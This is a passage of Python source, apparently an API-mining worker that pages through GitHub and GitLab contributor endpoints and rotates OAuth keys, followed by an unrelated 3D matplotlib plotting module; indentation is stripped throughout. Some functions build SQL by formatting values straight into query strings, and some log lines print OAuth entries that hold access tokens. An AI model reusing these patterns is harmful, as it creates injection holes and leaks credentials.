(page_number >= last_page_number and forward_pagination):
self.logger.info("No more pages to check, breaking from pagination.\n")
break
page_number = page_number + 1 if forward_pagination else page_number - 1
if forward_pagination:
need_insertion, need_update = self.organize_needed_data(
all_data, table_values, list(table.primary_key)[0].name, action_map,
in_memory=in_memory
)
return {
'insert': need_insertion,
'update': need_update,
'all': all_data
}
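# Illustrative call sketch (not part of the original source; the repo, table, and where
# clause are hypothetical). The url must contain a '{}' placeholder for the page number;
# the return value separates rows needing insertion, rows needing updates, and everything
# that was fetched.
#
#   url = "https://api.github.com/repos/octocat/hello-world/issues?per_page=100&page={}"
#   source = worker.paginate_endpoint(
#       url, action_map=action_map, table=worker.issues_table,
#       where_clause=worker.issues_table.c.repo_id == repo_id)
#   # source == {'insert': [...], 'update': [...], 'all': [...]}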
def paginate(self, url, duplicate_col_map, update_col_map, table, table_pkey, where_clause="", value_update_col_map={}, platform="github"):
""" DEPRECATED
Paginate either backwards or forwards (depending on the value of the worker's
finishing_task attribute) through all the GitHub or GitLab api endpoint pages.
:param url: String, the url of the API endpoint we are paginating through; expects
a curly brace string formatter within the string to format the Integer
representing the page number to be returned
:param duplicate_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
duplicates (if source data value == value in existing database row, then this
element is a duplicate and would not need an insertion). Key is source data
column name, value is database field name. Example: {'id': 'gh_issue_id'}
:param update_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
updates (if source data value != value in existing database row, then an
update is needed). Key is source data column name, value is database field name.
Example: {'id': 'gh_issue_id'}
:param table: String, the name of the table that holds the values to check for
duplicates/updates against
:param table_pkey: String, the field name of the primary key of the table in
the database that we are getting the values for to cross-reference to check
for duplicates.
:param where_clause: String, optional where clause to filter the values
that are queried when preparing the values that will be cross-referenced
for duplicates/updates
:param value_update_col_map: Dictionary, sometimes we add a new field to a table,
and we want to trigger an update of that row in the database even if all of the
data values are the same and would not need an update ordinarily. Checking for
a specific existing value in the database field allows us to do this. The key is the
name of the field in the database we are checking for a specific value to trigger
an update, the value is the value we are checking for equality to trigger an update.
Example: {'cntrb_id': None}
:return: List of dictionaries, all data points from the pages of the specified API endpoint
each with a 'flag' key-value pair representing the required action to take with that
data point (i.e. 'need_insertion', 'need_update', 'none')
"""
update_keys = list(update_col_map.keys()) if update_col_map else []
update_keys += list(value_update_col_map.keys()) if value_update_col_map else []
cols_to_query = list(duplicate_col_map.keys()) + update_keys + [table_pkey]
table_values = self.get_table_values(cols_to_query, [table], where_clause)
i = 1
multiple_pages = False
tuples = []
while True:
num_attempts = 0
success = False
while num_attempts < 3:
self.logger.info(f'Hitting endpoint: {url.format(i)}...\n')
r = requests.get(url=url.format(i), headers=self.headers)
self.update_rate_limit(r, platform=platform)
if 'last' not in r.links:
last_page = None
else:
if platform == "github":
last_page = r.links['last']['url'][-6:].split('=')[1]
elif platform == "gitlab":
last_page = r.links['last']['url'].split('&')[2].split("=")[1]
self.logger.info("Analyzing page {} of {}\n".format(i, int(last_page) + 1 if last_page is not None else '*last page not known*'))
try:
j = r.json()
except:
j = json.loads(json.dumps(r.text))
if type(j) != dict and type(j) != str:
success = True
break
elif type(j) == dict:
self.logger.info("Request returned a dict: {}\n".format(j))
if j['message'] == 'Not Found':
self.logger.warning("Github repo was not found or does not exist for endpoint: {}\n".format(url))
break
if j['message'] == 'You have triggered an abuse detection mechanism. Please wait a few minutes before you try again.':
num_attempts -= 1
self.logger.info("rate limit update code goes here")
self.update_rate_limit(r, temporarily_disable=True,platform=platform)
if j['message'] == 'Bad credentials':
self.logger.info("rate limit update code goes here")
self.update_rate_limit(r, bad_credentials=True, platform=platform)
elif type(j) == str:
self.logger.info(f'J was string: {j}\n')
if '<!DOCTYPE html>' in j:
self.logger.info('HTML was returned, trying again...\n')
elif len(j) == 0:
self.logger.warning('Empty string, trying again...\n')
else:
try:
j = json.loads(j)
success = True
break
except:
pass
num_attempts += 1
if not success:
break
# Find last page so we can decrement from there
if 'last' in r.links and not multiple_pages and not self.finishing_task:
if platform == "github":
param = r.links['last']['url'][-6:]
i = int(param.split('=')[1]) + 1
elif platform == "gitlab":
i = int(r.links['last']['url'].split('&')[2].split("=")[1]) + 1
self.logger.info("Multiple pages of request, last page is " + str(i - 1) + "\n")
multiple_pages = True
elif not multiple_pages and not self.finishing_task:
self.logger.info("Only 1 page of request\n")
elif self.finishing_task:
self.logger.info("Finishing a previous task, paginating forwards ..."
" excess rate limit requests will be made\n")
if len(j) == 0:
self.logger.info("Response was empty, breaking from pagination.\n")
break
# Checking contents of requests with what we already have in the db
j = self.assign_tuple_action(j, table_values, update_col_map, duplicate_col_map, table_pkey, value_update_col_map)
if not j:
self.logger.error("Assigning tuple action failed, moving to next page.\n")
i = i + 1 if self.finishing_task else i - 1
continue
try:
to_add = [obj for obj in j if obj not in tuples and (obj['flag'] != 'none')]
except Exception as e:
self.logger.error("Failure accessing data of page: {}. Moving to next page.\n".format(e))
i = i + 1 if self.finishing_task else i - 1
continue
if len(to_add) == 0 and multiple_pages and 'last' in r.links:
self.logger.info("{}".format(r.links['last']))
if platform == "github":
page_number = int(r.links['last']['url'][-6:].split('=')[1])
elif platform == "gitlab":
page_number = int(r.links['last']['url'].split('&')[2].split("=")[1])
if i - 1 != page_number:
self.logger.info("No more pages with unknown tuples, breaking from pagination.\n")
break
tuples += to_add
i = i + 1 if self.finishing_task else i - 1
# Since we already would have checked the first page... break
if (i == 1 and multiple_pages and not self.finishing_task) or i < 1 or len(j) == 0:
self.logger.info("No more pages to check, breaking from pagination.\n")
break
return tuples
def query_github_contributors(self, entry_info, repo_id):
""" Data collection function
Query the GitHub API for contributors
"""
self.logger.info(f"Querying contributors with given entry info: {entry_info}\n")
github_url = entry_info['given']['github_url'] if 'github_url' in entry_info['given'] else entry_info['given']['git_url']
# Extract owner/repo from the url for the endpoint
owner, name = self.get_owner_repo(github_url)
# Set the base of the url and place to hold contributors to insert
contributors_url = (
f"https://api.github.com/repos/{owner}/{name}/" +
"contributors?per_page=100&page={}"
)
# Get contributors that we already have stored
# Set our duplicate and update column map keys (something other than PK) to
# check duplicates/needed column updates with
table = 'contributors'
table_pkey = 'cntrb_id'
update_col_map = {'cntrb_email': 'email'}
duplicate_col_map = {'cntrb_login': 'login'}
#list to hold contributors needing insertion or update
contributors = self.paginate(contributors_url, duplicate_col_map, update_col_map, table, table_pkey)
self.logger.info("Count of contributors needing insertion: " + str(len(contributors)) + "\n")
for repo_contributor in contributors:
try:
# Need to hit this single contributor endpoint to get extra data,
# e.g. the `created_at` field
cntrb_url = ("https://api.github.com/users/" + repo_contributor['login'])
self.logger.info("Hitting endpoint: " + cntrb_url + " ...\n")
r = requests.get(url=cntrb_url, headers=self.headers)
self.update_gh_rate_limit(r)
contributor = r.json()
company = None
location = None
email = None
if 'company' in contributor:
company = contributor['company']
if 'location' in contributor:
location = contributor['location']
if 'email' in contributor:
email = contributor['email']
canonical_email = contributor['email']
cntrb = {
"cntrb_login": contributor['login'],
"cntrb_created_at": contributor['created_at'],
"cntrb_email": email,
"cntrb_company": company,
"cntrb_location": location,
# "cntrb_type": , dont have a use for this as of now ... let it default to null
"cntrb_canonical": canonical_email,
"gh_user_id": contributor['id'],
"gh_login": contributor['login'],
"gh_url": contributor['url'],
"gh_html_url": contributor['html_url'],
"gh_node_id": contributor['node_id'],
"gh_avatar_url": contributor['avatar_url'],
"gh_gravatar_id": contributor['gravatar_id'],
"gh_followers_url": contributor['followers_url'],
"gh_following_url": contributor['following_url'],
"gh_gists_url": contributor['gists_url'],
"gh_starred_url": contributor['starred_url'],
"gh_subscriptions_url": contributor['subscriptions_url'],
"gh_organizations_url": contributor['organizations_url'],
"gh_repos_url": contributor['repos_url'],
"gh_events_url": contributor['events_url'],
"gh_received_events_url": contributor['received_events_url'],
"gh_type": contributor['type'],
"gh_site_admin": contributor['site_admin'],
"tool_source": self.tool_source,
"tool_version": self.tool_version,
"data_source": self.data_source
}
# Commit insertion to table
if repo_contributor['flag'] == 'need_update':
result = self.db.execute(self.contributors_table.update().where(
self.contributors_table.c.cntrb_email==email).values(cntrb))
self.logger.info("Updated tuple in the contributors table with existing email: {}".format(email))
self.cntrb_id_inc = repo_contributor['pkey']
elif repo_contributor['flag'] == 'need_insertion':
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: {}".format(result.inserted_primary_key))
self.results_counter += 1
self.logger.info("Inserted contributor: " + contributor['login'] + "\n")
# Increment our global track of the cntrb id for the possibility of it being used as a FK
self.cntrb_id_inc = int(result.inserted_primary_key[0])
except Exception as e:
self.logger.error("Caught exception: {}".format(e))
self.logger.error("Cascading Contributor Anomalie from missing repo contributor data: {} ...\n".format(cntrb_url))
continue
def query_github_contributors_bulk(self, entry_info, repo_id):
""" Data collection function
Query the GitHub API for contributors
"""
self.logger.info(f"Querying contributors with given entry info: {entry_info}\n")
github_url = entry_info['given']['github_url'] if 'github_url' in entry_info['given'] else entry_info['given']['git_url']
owner, name = self.get_owner_repo(github_url)
contributors_url = (f"https://api.github.com/repos/{owner}/{name}/" +
"contributors?per_page=100&page={}")
action_map = {
'insert': {
'source': ['login'],
'augur': ['cntrb_login']
},
'update': {
'source': ['email'],
'augur': ['cntrb_email']
}
}
source_contributors = self.paginate_endpoint(contributors_url, action_map=action_map,
table=self.contributors_table)
contributors_insert = []
for repo_contributor in source_contributors['insert']:
# Need to hit this single contributor endpoint to get extra data
cntrb_url = (f"https://api.github.com/users/{repo_contributor['login']}")
self.logger.info(f"Hitting endpoint: {cntrb_url} ...\n")
r = requests.get(url=cntrb_url, headers=self.headers)
self.update_gh_rate_limit(r)
contributor = r.json()
contributors_insert.append({
'cntrb_login': contributor['login'],
'cntrb_created_at': contributor['created_at'],
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_canonical': contributor['email'] if 'email' in contributor else None,
'gh_user_id': contributor['id'],
'gh_login': contributor['login'],
'gh_url': contributor['url'],
'gh_html_url': contributor['html_url'],
'gh_node_id': contributor['node_id'],
'gh_avatar_url': contributor['avatar_url'],
'gh_gravatar_id': contributor['gravatar_id'],
'gh_followers_url': contributor['followers_url'],
'gh_following_url': contributor['following_url'],
'gh_gists_url': contributor['gists_url'],
'gh_starred_url': contributor['starred_url'],
'gh_subscriptions_url': contributor['subscriptions_url'],
'gh_organizations_url': contributor['organizations_url'],
'gh_repos_url': contributor['repos_url'],
'gh_events_url': contributor['events_url'],
'gh_received_events_url': contributor['received_events_url'],
'gh_type': contributor['type'],
'gh_site_admin': contributor['site_admin'],
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
})
contributors_insert_result, contributors_update_result = self.bulk_insert(self.contributors_table,
update=source_contributors['update'], unique_columns=action_map['insert']['augur'],
insert=contributors_insert, update_columns=action_map['update']['augur'])
def query_github_contributors_fast(self, entry_info, repo_id):
""" Data collection function
Query the GitHub API for contributors
"""
self.logger.info(f"Querying contributors with given entry info: {entry_info}")
github_url = (
entry_info['given']['github_url'] if 'github_url' in entry_info['given']
else entry_info['given']['git_url']
)
contributors_url = (
f"https://api.github.com/repos/{self.owner}/{self.name}/"
"contributors?per_page=100&page={}"
)
action_map = {
'insert': {
'source': ['login'],
'augur': ['cntrb_login']
},
'update': {
'source': ['email'],
'augur': ['cntrb_email']
}
}
source_contributors = self.paginate_endpoint(
contributors_url, action_map=action_map, table=self.contributors_table
)
contributors_insert = [
{
'cntrb_login': contributor['login'],
'cntrb_created_at': (
contributor['created_at'] if 'created_at' in contributor else None
),
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_canonical': contributor['email'] if 'email' in contributor else None,
'gh_user_id': contributor['id'],
'gh_login': contributor['login'],
'gh_url': contributor['url'],
'gh_html_url': contributor['html_url'],
'gh_node_id': contributor['node_id'],
'gh_avatar_url': contributor['avatar_url'],
'gh_gravatar_id': contributor['gravatar_id'],
'gh_followers_url': contributor['followers_url'],
'gh_following_url': contributor['following_url'],
'gh_gists_url': contributor['gists_url'],
'gh_starred_url': contributor['starred_url'],
'gh_subscriptions_url': contributor['subscriptions_url'],
'gh_organizations_url': contributor['organizations_url'],
'gh_repos_url': contributor['repos_url'],
'gh_events_url': contributor['events_url'],
'gh_received_events_url': contributor['received_events_url'],
'gh_type': contributor['type'],
'gh_site_admin': contributor['site_admin'],
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
} for contributor in source_contributors['insert']
]
self.bulk_insert(
self.contributors_table, update=source_contributors['update'],
unique_columns=action_map['insert']['augur'],
insert=contributors_insert, update_columns=action_map['update']['augur']
)
def query_gitlab_contribtutors(self, entry_info, repo_id):
gitlab_url = (
entry_info['given']['gitlab_url'] if 'gitlab_url' in entry_info['given']
else entry_info['given']['git_url']
)
self.logger.info("Querying contributors with given entry info: " + str(entry_info) + "\n")
path = urlparse(gitlab_url)
split = path[2].split('/')
owner = split[1]
name = split[2]
# Handles git url case by removing the extension
if ".git" in name:
name = name[:-4]
url_encoded_format = quote(owner + '/' + name, safe='')
table = 'contributors'
table_pkey = 'cntrb_id'
### %TODO Remap this to a GitLab Contributor ID like the GitHub Worker.
### Following Gabe's rework of the contributor worker.
update_col_map = {'cntrb_email': 'email'}
duplicate_col_map = {'cntrb_login': 'email'}
# list to hold contributors needing insertion or update
contributors = self.paginate("https://gitlab.com/api/v4/projects/" + url_encoded_format + "/repository/contributors?per_page=100&page={}", duplicate_col_map, update_col_map, table, table_pkey, platform='gitlab')
for repo_contributor in contributors:
try:
cntrb_compressed_url = ("https://gitlab.com/api/v4/users?search=" + repo_contributor['email'])
self.logger.info("Hitting endpoint: " + cntrb_compressed_url + " ...\n")
r = requests.get(url=cntrb_compressed_url, headers=self.headers)
contributor_compressed = r.json()
email = repo_contributor['email']
self.logger.info(contributor_compressed)
if len(contributor_compressed) == 0 or type(contributor_compressed) is dict or "id" not in contributor_compressed[0]:
continue
self.logger.info("Fetching for user: " + str(contributor_compressed[0]["id"]))
cntrb_url = ("https://gitlab.com/api/v4/users/" + str(contributor_compressed[0]["id"]))
self.logger.info("Hitting end point to get complete contributor info now: " + cntrb_url + "...\n")
r = requests.get(url=cntrb_url, headers=self.headers)
contributor = r.json()
cntrb = {
"cntrb_login": contributor.get('username', None),
"cntrb_created_at": contributor.get('created_at', None),
"cntrb_email": email,
"cntrb_company": contributor.get('organization', None),
"cntrb_location": contributor.get('location', None),
# "cntrb_type": , dont have a use for this as of now ... let it default to null
"cntrb_canonical": contributor.get('public_email', None),
"gh_user_id": contributor.get('id', None),
"gh_login": contributor.get('username', None),
"gh_url": contributor.get('web_url', None),
"gh_html_url": contributor.get('web_url', None),
"gh_node_id": None,
"gh_avatar_url": contributor.get('avatar_url', None),
"gh_gravatar_id": None,
"gh_followers_url": None,
"gh_following_url": None,
"gh_gists_url": None,
"gh_starred_url": None,
"gh_subscriptions_url": None,
"gh_organizations_url": None,
"gh_repos_url": None,
"gh_events_url": None,
"gh_received_events_url": None,
"gh_type": None,
"gh_site_admin": None,
"tool_source": self.tool_source,
"tool_version": self.tool_version,
"data_source": self.data_source
}
# Commit insertion to table
if repo_contributor['flag'] == 'need_update':
result = self.db.execute(self.contributors_table.update().where(
self.contributors_table.c.cntrb_email == email).values(cntrb))
self.logger.info("Updated tuple in the contributors table with existing email: {}".format(email))
self.cntrb_id_inc = repo_contributor['pkey']
elif repo_contributor['flag'] == 'need_insertion':
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: {}".format(result.inserted_primary_key))
self.results_counter += 1
self.logger.info("Inserted contributor: " + contributor['username'] + "\n")
# Increment our global track of the cntrb id for the possibility of it being used as a FK
self.cntrb_id_inc = int(result.inserted_primary_key[0])
except Exception as e:
self.logger.info("Caught exception: {}".format(e))
self.logger.info("Cascading Contributor Anomalie from missing repo contributor data: {} ...\n".format(cntrb_url))
continue
def record_model_process(self, repo_id, model):
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": model,
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Stopped",
"total_results": self.results_counter
}
if self.finishing_task:
result = self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.history_id += 1
else:
result = self.helper_db.execute(self.worker_history_table.insert().values(task_history))
self.logger.info("Record incomplete history tuple: {}\n".format(result.inserted_primary_key))
self.history_id = int(result.inserted_primary_key[0])
self.collection_start_time = time.time()
def register_task_completion(self, task, repo_id, model):
self.logger.info(f"Worker completed this task in {self.collection_start_time - time.time()} seconds.\n")
# Task to send back to broker
task_completed = {
'worker_id': self.config['id'],
'job_type': "MAINTAIN",
'repo_id': repo_id,
'job_model': model
}
key = 'github_url' if 'github_url' in task['given'] else 'git_url' if 'git_url' in task['given'] else \
'gitlab_url' if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
task_completed[key] = task['given']['github_url'] if 'github_url' in task['given'] else task['given']['git_url'] \
if 'git_url' in task['given'] else task['given']['gitlab_url'] if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
if key == 'INVALID_GIVEN':
self.register_task_failure(task, repo_id, "INVALID_GIVEN: Not a github/gitlab/git url.")
return
# Add to history table
task_history = {
'repo_id': repo_id,
'worker': self.config['id'],
'job_model': model,
'oauth_id': self.oauths[0]['oauth_id'],
'timestamp': datetime.datetime.now(),
'status': "Success",
'total_results': self.results_counter
}
self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.logger.info(f"Recorded job completion for: {task_completed}\n")
# Update job process table
updated_job = {
'since_id_str': repo_id,
'last_count': self.results_counter,
'last_run': datetime.datetime.now(),
'analysis_state': 0
}
self.helper_db.execute(self.worker_job_table.update().where(
self.worker_job_table.c.job_model==model).values(updated_job))
self.logger.info(f"Updated job process for model: {model}\n")
if self.config['offline_mode'] is False:
# Notify broker of completion
self.logger.info(f"Telling broker we completed task: {task_completed}\n")
self.logger.info(f"This task inserted: {self.results_counter + self.insert_counter} tuples " +
f"and updated {self.update_counter} tuples.\n")
requests.post('http://{}:{}/api/unstable/completed_task'.format(
self.config['host_broker'],self.config['port_broker']), json=task_completed)
# Reset results counter for next task
self.results_counter = 0
self.insert_counter = 0
self.update_counter = 0
def register_task_failure(self, task, repo_id, e):
self.logger.error(f"Worker ran into an error for task: {task}")
self.logger.error(
f"Worker was processing this task for {self.collection_start_time - time.time()} "
"seconds."
)
self.logger.error("Printing traceback...")
self.logger.error(e)
tb = traceback.format_exc()
self.logger.error(tb)
self.logger.info(f"This task inserted {self.results_counter} tuples before failure.")
self.logger.info("Notifying broker and logging task failure in database...")
key = (
'github_url' if 'github_url' in task['given'] else 'git_url'
if 'git_url' in task['given'] else 'gitlab_url'
if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
)
url = task['given'][key]
""" Query all repos with repo url of given task """
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(url))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
task['worker_id'] = self.config['id']
try:
requests.post("http://{}:{}/api/unstable/task_error".format(
self.config['host_broker'],self.config['port_broker']), json=task)
except requests.exceptions.ConnectionError:
self.logger.error("Could not send task failure message to the broker:")
self.logger.error(e)
except Exception:
self.logger.error("An error occured while informing broker about task failure:")
self.logger.error(e)
# Add to history table
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": task['models'][0],
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Error",
"total_results": self.results_counter
}
self.helper_db.execute(
self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id
).values(task_history)
)
self.logger.error(f"Recorded job error in the history table for: {task}")
# Update job process table
updated_job = {
"since_id_str": repo_id,
"last_count": self.results_counter,
"last_run": datetime.datetime.now(),
"analysis_state": 0
}
self.helper_db.execute(
self.worker_job_table.update().where(
self.worker_job_table.c.job_model==task['models'][0]
).values(updated_job)
)
self.logger.info(f"Updated job process for model: {task['models'][0]}\n")
# Reset results counter for next task
self.results_counter = 0
def get_relevant_columns(self, table, action_map={}):
columns = copy.deepcopy(action_map['update']['augur']) if 'update' in action_map else []
columns += action_map['value_update']['augur'] if 'value_update' in action_map else []
columns += action_map['insert']['augur'] if 'insert' in action_map else []
return [table.c[column] for column in
columns + [list(table.primary_key)[0].name]]
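# Illustrative sketch (hedged; the names below are made up, not from this worker):
# a hypothetical action_map and what get_relevant_columns() would select from it.
#   action_map = {
#       'insert': {'source': ['id'], 'augur': ['gh_issue_id']},
#       'update': {'source': ['state'], 'augur': ['issue_state']}
#   }
#   cols = self.get_relevant_columns(self.issues_table, action_map)
#   # -> the 'issue_state' and 'gh_issue_id' columns plus the table's primary key column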
def retrieve_tuple(self, key_values, tables):
table_str = tables[0]
del tables[0]
key_values_items = list(key_values.items())
for col, value in [key_values_items[0]]:
where_str = col + " = '" + value + "'"
del key_values_items[0]
for col, value in key_values_items:
where_str += ' AND ' + col + " = '" + value + "'"
for table in tables:
table_str += ", " + table
retrieveTupleSQL = s.sql.text("""
SELECT * FROM {} WHERE {}
""".format(table_str, where_str))
values = json.loads(
pd.read_sql(retrieveTupleSQL, self.db, params={}).to_json(orient="records")
)
return values
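# Illustrative sketch (hedged; the example values are assumptions): given
#   key_values = {'cntrb_login': 'octocat'} and tables = ['contributors'],
# retrieve_tuple() builds roughly
#   SELECT * FROM contributors WHERE cntrb_login = 'octocat'
# and returns the matching rows as a list of dicts. Note the first entry of
# `tables` is consumed as the base table; any remaining tables are comma-joined.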
def update_gitlab_rate_limit(self, response, bad_credentials=False, temporarily_disable=False):
# Try to get the rate limit from the response headers; sometimes this fails (known API quirk)
# In that case we just decrement from the last received header count
if bad_credentials and len(self.oauths) > 1:
self.logger.info(
f"Removing oauth with bad credentials from consideration: {self.oauths[0]}"
)
del self.oauths[0]
if temporarily_disable:
self.logger.info("Gitlab rate limit reached. Temp. disabling...")
self.oauths[0]['rate_limit'] = 0
else:
try:
self.oauths[0]['rate_limit'] = int(response.headers['RateLimit-Remaining'])
except:
self.oauths[0]['rate_limit'] -= 1
self.logger.info("Updated rate limit, you have: " +
str(self.oauths[0]['rate_limit']) + " requests remaining.")
if self.oauths[0]['rate_limit'] <= 0:
try:
reset_time = response.headers['RateLimit-Reset']
except Exception as e:
self.logger.info(f"Could not get reset time from headers because of error: {e}")
reset_time = 3600
time_diff = datetime.datetime.fromtimestamp(int(reset_time)) - datetime.datetime.now()
self.logger.info("Rate limit exceeded, checking for other available keys to use.")
# Find the oauth with the highest remaining rate limit among our list of oauths
new_oauth = self.oauths[0]
# Endpoint to hit solely to retrieve rate limit information from headers of the response
url = "https://gitlab.com/api/v4/version"
other_oauths = self.oauths[0:] if len(self.oauths) > 1 else []
for oauth in other_oauths:
# self.logger.info("Inspecting rate limit info for oauth: {}\n".format(oauth))
self.headers = {"PRIVATE-TOKEN" : oauth['access_token']}
response = requests.get(url=url, headers=self.headers)
oauth['rate_limit'] = int(response.headers['RateLimit-Remaining'])
oauth['seconds_to_reset'] = (
datetime.datetime.fromtimestamp(
int(response.headers['RateLimit-Reset'])
) - datetime.datetime.now()
).total_seconds()
# Update oauth to switch to if a higher limit is found
if oauth['rate_limit'] > new_oauth['rate_limit']:
self.logger.info(f"Higher rate limit found in oauth: {oauth}")
new_oauth = oauth
elif (
oauth['rate_limit'] == new_oauth['rate_limit']
and oauth['seconds_to_reset'] < new_oauth['seconds_to_reset']
):
self.logger.info(
f"Lower wait time found in oauth with same rate limit: {oauth}"
)
new_oauth = oauth
if new_oauth['rate_limit'] <= 0 and new_oauth['seconds_to_reset'] > 0:
self.logger.info(
"No oauths with >0 rate limit were found, waiting for oauth with "
f"smallest wait time: {new_oauth}\n"
)
time.sleep(new_oauth['seconds_to_reset'])
# Make new oauth the 0th element in self.oauths so we know which one is in use
index = self.oauths.index(new_oauth)
self.oauths[0], self.oauths[index] = self.oauths[index], self.oauths[0]
self.logger.info("Using oauth: {}\n".format(self.oauths[0]))
# Change headers to be using the new oauth's key
self.headers = {"PRIVATE-TOKEN" : self.oauths[0]['access_token']}
def update_gh_rate_limit(self, response, bad_credentials=False, temporarily_disable=False):
# Try to get rate limit from request headers, sometimes it does not work (GH's issue)
# In that case we just decrement from the last received header count
if bad_credentials and len(self.oauths) > 1:
self.logger.warning(
f"Removing oauth with bad credentials from consideration: {self.oauths[0]}"
)
del self.oauths[0]
if temporarily_disable:
self.logger.debug(
"Github thinks we are abusing their api. Preventing use "
"of this key until its rate limit resets..."
)
self.oauths[0]['rate_limit'] = 0
else:
try:
self.oauths[0]['rate_limit'] = int(response.headers['X-RateLimit-Remaining'])
# self.logger.info("Recieved rate limit from headers\n")
except:
self.oauths[0]['rate_limit'] -= 1
self.logger.info("Headers did not work, had to decrement")
self.logger.info(
f"Updated rate limit, you have: {self.oauths[0]['rate_limit']} requests remaining."
)
if self.oauths[0]['rate_limit'] <= 0:
try:
reset_time = response.headers['X-RateLimit-Reset']
except Exception as e:
self.logger.error(f"Could not get reset time from headers because of error: {e}")
reset_time = 3600
time_diff = datetime.datetime.fromtimestamp(int(reset_time)) - datetime.datetime.now()
self.logger.info("Rate limit exceeded, checking for other available keys to use.")
# Find the oauth with the highest remaining rate limit among our list of oauths
new_oauth = self.oauths[0]
# Endpoint to hit solely to retrieve rate limit information from headers of the response
url = "https://api.github.com/users/gabe-heim"
other_oauths = self.oauths[0:] if len(self.oauths) > 1 else []
for oauth in other_oauths:
# self.logger.info("Inspecting rate limit info for oauth: {}\n".format(oauth))
self.headers = {'Authorization': 'token %s' % oauth['access_token']}
attempts = 3
success = False
while attempts > 0 and not success:
response = requests.get(url=url, headers=self.headers)
try:
oauth['rate_limit'] = int(response.headers['X-RateLimit-Remaining'])
oauth['seconds_to_reset'] = (
datetime.datetime.fromtimestamp(
int(response.headers['X-RateLimit-Reset'])
) - datetime.datetime.now()
).total_seconds()
success = True
except Exception as e:
self.logger.info(
f"oath method ran into error getting info from headers: {e}\n"
)
self.logger.info(f"{self.headers}\n{url}\n")
attempts -= 1
if not success:
continue
# Update oauth to switch to if a higher limit is found
if oauth['rate_limit'] > new_oauth['rate_limit']:
self.logger.info("Higher rate limit found in oauth: {}\n".format(oauth))
new_oauth = oauth
elif (
oauth['rate_limit'] == new_oauth['rate_limit']
and oauth['seconds_to_reset'] < new_oauth['seconds_to_reset']
):
self.logger.info(
f"Lower wait time found in oauth with same rate limit: {oauth}\n"
)
new_oauth = oauth
if new_oauth['rate_limit'] <= 0 and new_oauth['seconds_to_reset'] > 0:
self.logger.info(
"No oauths with >0 rate limit were found, waiting for oauth with "
f"smallest wait time: {new_oauth}\n"
)
time.sleep(new_oauth['seconds_to_reset'])
# Make new oauth the 0th element in self.oauths so we know which one is in use
index = self.oauths.index(new_oauth)
self.oauths[0], self.oauths[index] = self.oauths[index], self.oauths[0]
self.logger.info("Using oauth: {}\n".format(self.oauths[0]))
# Change headers to be using the new oauth's key
self.headers = {'Authorization': 'token %s' % self.oauths[0]['access_token']}
def update_rate_limit(
self, response, bad_credentials=False, temporarily_disable=False, platform="gitlab"
):
if platform == 'gitlab':
return self.update_gitlab_rate_limit(
response, bad_credentials=bad_credentials, temporarily_disable=temporarily_disable
)
elif platform == 'github':
return self.update_gh_rate_limit(
response, bad_credentials=bad_credentials, temporarily_disable=temporarily_disable
)
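# Illustrative usage sketch (hedged; variable names are assumptions): callers
# would typically refresh the tracked limit right after each API request, e.g.
#   response = requests.get(url, headers=self.headers)
#   self.update_rate_limit(response, platform='github')
# and, when a request signals bad credentials, drop the key from rotation:
#   self.update_rate_limit(response, bad_credentials=True, platform='github')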
|
plot.py
|
#
# Copyright (c) 2018, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# abstract plot support
#
import sys, time, threading, json, queue
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import art3d
# ------------------------------------------------
class Line(art3d.Line3D): # a line in 3D space
def __init__(self, from_xyz=(0, 0, 0), to_xyz=(1, 1, 1), *args, **kwargs):
xs, ys, zs = tuple(zip(from_xyz, to_xyz))
art3d.Line3D.__init__(self, xs, ys, zs, *args, **kwargs)
def location(self, from_, to_, *args):
xs, ys, zs = tuple(zip(from_, to_))
self.set_xdata(xs)
self.set_ydata(ys)
self.set_3d_properties(zs)
class Point(Line): # a point (a very short line) in 3D space
def __init__(self, xyz=(0, 0, 0), color='black', marker='.', size=1, vanish=1.0):
Line.__init__(self, xyz, xyz,
color=color, marker=marker, markersize=size,
markeredgewidth=1, linestyle='', fillstyle='none', alpha=1.0)
if vanish is not None:
tt = threading.Thread(target=self.__fadeout, args=(0.1 * vanish, 0.1))
tt.daemon = True
tt.start()
def __fadeout(self, period, delta):
def delay():
t = time.time()
c = 0
while True:
c += 1
yield max(t + c * period - time.time(), 0)
tick = delay()
while True:
time.sleep(next(tick))
na = self.get_alpha() - delta
if na <= 0:
self.remove()
break
self.set_alpha(na)
def location(self, at_, *args):
Line.location(self, at_, at_)
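# Illustrative sketch (hedged): how Line and Point might be added to a 3D axes.
# The figure/axes setup below is an assumption, not taken from this module.
#   fig = plt.figure()
#   ax = fig.add_subplot(111, projection='3d')
#   ln = Line((0, 0, 0), (1, 1, 1), color='gray')
#   pt = Point((0.5, 0.5, 0.5), color='red', size=6, vanish=None)  # vanish=None: no fade-out thread
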